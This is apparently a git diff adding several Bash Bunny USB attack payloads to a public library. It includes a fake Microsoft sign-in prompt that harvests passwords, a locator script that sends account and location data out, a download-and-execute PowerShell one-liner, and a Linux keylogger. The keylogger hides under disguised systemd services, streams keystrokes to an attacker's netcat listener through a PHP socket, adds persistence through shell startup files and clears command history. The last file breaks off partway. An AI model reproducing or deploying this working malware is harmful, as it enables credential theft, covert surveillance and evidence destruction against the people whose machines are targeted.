![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# ET Phone Home
A script I put together to locate your stolen devices, or your "stolen" baited devices
## Description
This program is meant to locate your devices. When someone plugs it into their computer
Using a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the
latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox.
Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.
## Getting Started
### Dependencies
* DropBox - Your Shared link for the intended file
* Windows 7,10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Your device is plugged into the targets computer
* A one liner command in the run box will execute the script on the bash bunny
Something Like What you see below will be in your loot folder:
NAME
EMAIL
LATITUDE AND LONGITUDE
```
Jakoby
jakoby@example.com
Latitude Longitude
-------- ---------
37.778919 -122.416313
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
Kalani
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-ET-Phone-Home)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

22
payloads/library/Incident_Response/-BB-ET-Phone-Home/payload.txt Normal file
View File

@ -0,0 +1,22 @@
# Title: ET-Phone-Home
# Description: this script will download and execute your locator script to find your device when it is plugged in
# Author: I am Jakoby
# Version: 1.0
# Category: Incident_Response
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ET-Phone-Home.ps1')"
QUACK ENTER

178
payloads/library/credentials/-BB-Credz-Plz/Credz-Plz.ps1 Normal file
View File

@ -0,0 +1,178 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
.DESCRIPTION
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
This will be followed by a fake authentication ui prompt.
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
Once the target enters their credentials their information will be uploaded to your Bash Bunny
#>
#------------------------------------------------------------------------------------------------------------------------------------
# Creating loot folder
# Get Drive Letter
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
# Test if directory exists if not create directory in loot folder to store file
$TARGETDIR = "$bb\loot\Credz-Plz\$env:computername"
if(!(Test-Path -Path $TARGETDIR )){
mkdir $TARGETDIR
}
#------------------------------------------------------------------------------------------------------------------------------------
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to generate the ui.prompt you will use to harvest their credentials
#>
function Get-Creds {
do{
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {
[System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
Get-Creds
}
$creds = $cred.GetNetworkCredential() | fl
return $creds
# ...
$done = $true
} until ($done)
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to pause the script until a mouse movement is detected
#>
function Pause-Script{
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
$o=New-Object -ComObject WScript.Shell
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
#>
function Caps-Off {
Add-Type -AssemblyName System.Windows.Forms
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
#If true, toggle CapsLock key, to ensure that the script doesn't fail
if ($caps -eq $true){
$key = New-Object -ComObject WScript.Shell
$key.SendKeys('{CapsLock}')
}
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
#>
Pause-Script
Caps-Off
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account")
$creds = Get-Creds
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to save the gathered credentials to a file in the temp directory
#>
echo $creds >> $env:TMP\$FileName
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This exfiltrates your loot to the Bash Bunny
#>
Move-Item $env:TMP\$FileName $TARGETDIR\$FileName
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

102
payloads/library/credentials/-BB-Credz-Plz/README.md Normal file
View File

@ -0,0 +1,102 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Credz-Plz
A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.
## Description
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
This will be followed by a fake authentication ui prompt.
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
Once the target enters their credentials their information will be uploaded to your dropbox for collection
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg)
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg)
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

22
payloads/library/credentials/-BB-Credz-Plz/payload.txt Normal file
View File

@ -0,0 +1,22 @@
# Title: Credz-Plz
# Description: A script used to prompt the target to enter their creds to later be exfiltrated to the Bash Bunny
# Author: I am Jakoby
# Version: 1.0
# Category: Recon
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Credz-Plz.ps1')"
QUACK ENTER

BIN
payloads/library/credentials/-BB-Credz-Plz/sign-in.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 73 KiB

BIN
payloads/library/credentials/-BB-Credz-Plz/unusual-sign-in.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 39 KiB

62
payloads/library/credentials/BunnyLogger/README.md Normal file
View File

@ -0,0 +1,62 @@
## About:
* Title: BunnyLogger
* Description: Key logger which sends each and every key stroke of target remotely/locally.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Credentials
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker.
### Features:
* Live keystroke capturing.
* Detailed key logs.
* Persistent
* Autostart payload on boot.
### Workflow:
* Encoding payload and injecting on target's system.
* Checks whether internet is connected to the target system.
* If internet is connected then it sends raw keystrokes to attacker.
* Attacker processes raw keystrokes.
### Changes to be made in payload.sh:
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`.
* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| xinput | /tools/ |
### Usage:
1. Encode payload.txt and inject into target's system.
2. Start netcat listner on attacking system:
* `nc -lvp <port number> > <log filename>` use this command to create new logfile with raw keystrokes.
* `nc -lvp <port number> >> <log filename>` use this command to append raw keystrokes to existing logfile.
3. Process raw keystrokes using BunnyLoggerDecoder utility:
```
./bunnyLoggerDecoder
bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger.
Usage:
Decode captured log: [./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]
Options:
-f Specify Log file.
-m Select Mode(normal|informative)
-o Specify Output file.
-h For this banner.
```
#### Support me if you like my work:
* https://twitter.com/drapl0n

50
payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder Normal file
View File

@ -0,0 +1,50 @@
usage () {
echo -e "BunnyLoggerDecoder is used to decode raw key strokes acquired by BunnyLogger.\n"
echo -e "Usage: \nDecode captured log:\t[./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]";
echo -e "\nOptions:"
echo -e "-f\tSpecify Log file."
echo -e "-m\tSelect Mode(normal|informative)"
echo -e "-o\tSpecify Output file."
echo -e "-h\tFor this banner."
}
while getopts o:m:f:h: flag
do
case "${flag}" in
o) output=$OPTARG ;;
m) mode=$OPTARG ;;
f) filename=$OPTARG ;;
h) help=$OPTARG ;;
*)
usage
exit 1
esac
done
if [ -z "$output" ] && [ -z "$filename" ]; then
usage
exit 1
fi
if [ -z "$filename" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
exit 1
fi
if [ -z "$output" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
exit 1
fi
if [ -z "$mode" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
exit 1
fi
if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
echo -e "BunnyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
exit 1
fi
if [ "$mode" == "normal" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
exit 1
fi
if [ "$mode" == "informative" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
exit 1
fi

24
payloads/library/credentials/BunnyLogger/payload.sh Normal file
View File

@ -0,0 +1,24 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir /var/tmp/.system
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/tools/xinput /var/tmp/.system/
echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
chmod +x /var/tmp/.system/sys
chmod +x /var/tmp/.system/xinput
echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
chmod +x /var/tmp/.system/systemBus
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
chmod +x /var/tmp/.system/reboot
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
systemctl --user daemon-reload
systemctl --user enable --now systemBUS.service
systemctl --user start --now systemBUS.service
systemctl --user enable --now reboot.service
systemctl --user start --now reboot.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

56
payloads/library/credentials/BunnyLogger/payload.txt Normal file
View File

@ -0,0 +1,56 @@
# Title: BunnyLogger
# Description: Key logger which sends each and every key stroke of target remotely/locally.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 2000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

BIN
payloads/library/credentials/BunnyLogger/xinput Normal file
View File

Binary file not shown.

39
payloads/library/credentials/BunnyLogger2.0/README.md Normal file
View File

@ -0,0 +1,39 @@
## About:
* Title: BunnyLogger 2.0
* Description: Key logger which sends each and every key stroke of target remotely/locally.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Credentials
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## BunnyLogger 2.0: BunnyLogger is a Key Logger which captures every key stroke of target and send them to attacker.
### Features:
* Live keystroke capturing.
* Stored Keystroke capturing.
* Bunny Logger Manager: Interactive TUI Dashboard.
* Detailed key logs.
* Persistent.
* Autostart payload on boot.
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ------------------------------ |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| requirements/* | /payloads/library/bunnyLogger2 |
### LED Status:
* `LED SETUP` : MAGENTA
* `LED ATTACK` : YELLOW
* `LED FINISH` : GREEN
### Usage:
* Install BunnyLogger 2.0: `chmod +x install.sh && sudo ./install.sh`
* Run : `bunnyLoggerMgr` to launch BunnyLogger Manager.
#### Support me if you like my work:
* https://twitter.com/drapl0n

7
payloads/library/credentials/BunnyLogger2.0/install.sh Normal file
View File

@ -0,0 +1,7 @@
#!/bin/bash
loc=$HOME/.config/bunnyLogger
mkdir $loc
cp requirements/payload.sh $loc
touch $loc/bunnyLogger.db
chmod +x requirements/bunnyLoggerMgr
sudo cp requirements/bunnyLoggerMgr /usr/local/bin/

53
payloads/library/credentials/BunnyLogger2.0/payload.txt Normal file
View File

@ -0,0 +1,53 @@
# Title: BunnyLogger
# Description: Key logger which sends each and every key stroke of target remotely/locally.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk'
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 2000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

191
payloads/library/credentials/BunnyLogger2.0/requirements/bunnyLoggerMgr Normal file
View File

@ -0,0 +1,191 @@
#!/bin/bash
allowAbort=true;
myInterruptHandler()
{
if $allowAbort; then
echo
echo -e "\n\033[1;34m[INFO]: \e[0mYou terminated bunnyLoggerMgr..." && exit 1;
fi;
}
trap myInterruptHandler SIGINT
echo -e "\033[4m\033[1mWelcome to BunnyLogger Manager!!!\033[0m"
echo
echo -e "1] Fetch Keylogs.\n2] Create new target.\n3] List available target.\n4] Remove target.\n5] Update target.\n6] Decode Key Logs."
echo
read -p "Enter your choice: " ch
create(){
read -p "Enter Target's name(without whitespaces): " name
if [[ $(grep -oh "\w*$name\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $name ]]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mName \"$name\" already exists."
exit 1
fi
read -p "Enter Servers IP: " ip
read -p "Enter Unique Port Number(1500-65535): " port
read -p "Enter another Unique Port Number(1500-65535): " secPort
if [ "$port" == "$secPort" ]; then
echo -e "\033[1;34m[INFO]: \033[0mTwo ports can't be similar."
exit 1
fi
if [[ $(grep -oh "\w*$ip\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $ip ]] && [[ $(grep -oh "\w*$port\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $port ]] && [[ $(grep -oh "\w*$secPort\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $secPort ]]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mTarget exist with similar IP address \"$ip\" and port number one \"$port\", port number two \"$secPort\"."
exit 1
fi
max=65535
min=1500
if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && (( $port <= $max )) && (( $port >= $min )) && (( $secPort <= $max )) && (( $secPort >= $min )); then
read -p "Specify directory for output: " dir
if [ ! -d "$dir" ]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
exit 1
else
cp -r ~/.config/bunnyLogger/payload.sh $dir
fi
sed -i -e "s/0.0.0.0/$ip/g" $dir/payload.sh
sed -i -e "s/4444/$port/g" $dir/payload.sh
sed -i -e "s/5555/$secPort/g" $dir/payload.sh
echo -e "$(echo "$name"|xargs)\t$ip\t$port\t$secPort" >> ~/.config/bunnyLogger/bunnyLogger.db
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$ip\" or Port Number \"$port\" or Port Number \"$secPort\"."
exit 1
fi
}
list(){
column -t -o ' ' ~/.config/bunnyLogger/bunnyLogger.db | awk '{print NR" - "$0}'
}
remove(){
echo
list
echo
read -p "Enter name of target to remove: " rmv
if grep -q $rmv ~/.config/bunnyLogger/bunnyLogger.db; then
sed -i "/\b\($rmv\)\b/d" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0m Successfully Removed \"$rmv\"."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$rmv\" no such target found."
fi
}
update(){
echo
list
echo
read -p "Choose target number: " cho
read -p "You want to update (ip|portOne|portTwo): " ent
if [ "$ent" = ip ]
then
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
read -p "Enter new ip: " use
if [[ $use =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
sed -i -e "$cho s/$one/$use/g" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0mSuccessfully Updated IP."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$use\"."
exit
fi
elif [ "$ent" = portOne ]
then
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
read -p "Enter new Port number: " useP
max=65535
min=1500
if (( $useP <= $max )) && (( $useP >= $min )); then
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
fi
elif [ "$ent" = portTwo ]
then
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
read -p "Enter new Port number: " useP
max=65535
min=1500
if (( $useP <= $max )) && (( $useP >= $min )); then
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
fi
else
echo -e "\033[1;31m\e[1m[ERROR]: \e0m[Invalid choice \"$ent\"."
fi
}
fetch(){
echo
list
echo
read -p "Enter Target number to connect: " cho
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
three=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
echo -en "1] Live Capture \t2]Fetch Stored Logs: "
read typ
case $typ in
1)
read -p "Specify directory for output: " dir
read -p "Enter filename to store logs: " filename
if [ ! -d "$dir" ]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
exit 1
else
echo "\033[1;34m\e[1m[[INFO]: \e[0mStarted Keylogs Capture..."
nc -lvp $two > $dir/$filename.log
fi
;;
2)
read -p "Specify directory for output: " dir
read -p "Enter filename to store logs: " filename
if [ ! -d "$dir" ]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
exit 1
else
nc -lvp 1444 > $dir/$filename.log &
nc -lvp $three
fi
;;
*)
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice.."
;;
esac
}
decode(){
echo -e "1] Normal Decode \t2] Informative Decode"
read -p "Enter your choice: " cho
read -p "Enter path of file to decode: " path
read -p "Enter path for decoded log: " out
case $cho in
1)
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path | grep press | awk '{print $4}' > $out
;;
2)
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path > $out
;;
*)
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice \"$cho\"."
;;
esac
}
case $ch in
1)
fetch
;;
2)
create
;;
3)
list
;;
4)
update
;;
5)
remove
;;
6)
decode
;;
*)
echo -e "\033[1;31m\e[1m[ERROR]: Invalid Choice \"$ch\"."
;;
esac

41
payloads/library/credentials/BunnyLogger2.0/requirements/clctrl Normal file
View File

@ -0,0 +1,41 @@
#!/bin/bash
transfer(){
echo -e "\033[1;34m[INFO]: Target Logs:\033[0m"
cd /var/tmp/.system/logs/
ls /var/tmp/.system/logs/ | sort
echo
echo -n "Enter filename to transfer: "
read ch
if [ -f $ch ];
then
echo -e "\033[1;34m[INFO]: Transferring file...\033[0m"
/var/tmp/.system/./nc -q 0 127.0.0.1 1444 < $ch >/dev/null 2>&1
if [ $? -eq 0 ]; then
echo -e "\033[1;32m[SUCCESS]: File Transferred.\033[0m"
else
echo -e "\033[1;34m[INFO]: Netcat listner is not running on Attacking system.\033[0m\n\033[1;31m[ERROR]: File transfer failed.\033[0m"
fi
else
echo -e "\033[1;31m[ERROR]: Invalid Filename \"$ch\".\033[0m"
fi
}
conti(){
while :
do
echo
